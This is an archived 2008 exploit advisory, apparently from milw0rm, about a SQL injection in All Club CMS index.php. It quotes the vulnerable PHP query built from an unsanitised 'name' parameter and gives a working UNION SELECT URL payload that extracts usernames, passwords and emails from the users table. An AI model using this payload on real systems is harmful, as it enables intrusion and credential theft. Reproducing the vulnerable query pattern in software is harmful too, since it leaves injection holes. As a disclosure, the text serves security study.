Loading ...
Global Do...
News & Politics
59
0
Try Now
Log In
Pricing
1 −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=− 2 All Club CMS <= 0.0.1f index.php Remote SQL Injection Vulnerability 3 −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=− 4 5 6 bug found by ka0x 7 D.O.M TEAM 2008 8 we are: ka0x, an0de, xarnuz 9 http://www.domlabs.org/ 10 11 Script affected: All Club CMS 12 Vulnerability: Remote SQL Injection 13 14 Download: http://sourceforge.net/project/showfiles.php?group_id=209058 15 need magic_quotes_gpc = off 16 17 18 vuln code: 19 20 [...] 21 22 if (isset($_GET[’name’]) && (!(empty($_GET[’name’])))) { 23 24 $name = $_GET[’name’]; 25 $name = stripslashes($name); 26 // stop hackers 27 if (eregi("http\:\/\/", $name)) { 28 echo "<br /> No go on the hack attempt.<br />"; 29 // log attempt, from IP, etc. 30 if ($SYS_SET[’ban_attack_ip’]) { 31 // ban ip if ban_attack_ip 32 } 33 die(); 34 } 35 36 $sth = $dbh−>prepare("SELECT * FROM accms_modules WHERE name=’$name’"); 37 38 [...] 39 40 41 Stripslashes function only deletes backslashes (\) and the backslashes 42 doubles (\\) becomes simple (\). 43 44 45 Exploit: 46 http://[host]/accms_path/index.php?name=−1’/**/union/**/select/**/1,concat(account,0x3a,password,0x3a,email),3,4,5,6, 7,8,9,1,1,1,1/**/from/**/accms_users/**/where/**/id=1/* 47 48 49 __EOF__ 50 51 # milw0rm.com [2008−02−05] Page 1/1 All Club CMS 0.0.2 index.php Remote SQL Injection Vulnerability ka0x 02/05/2008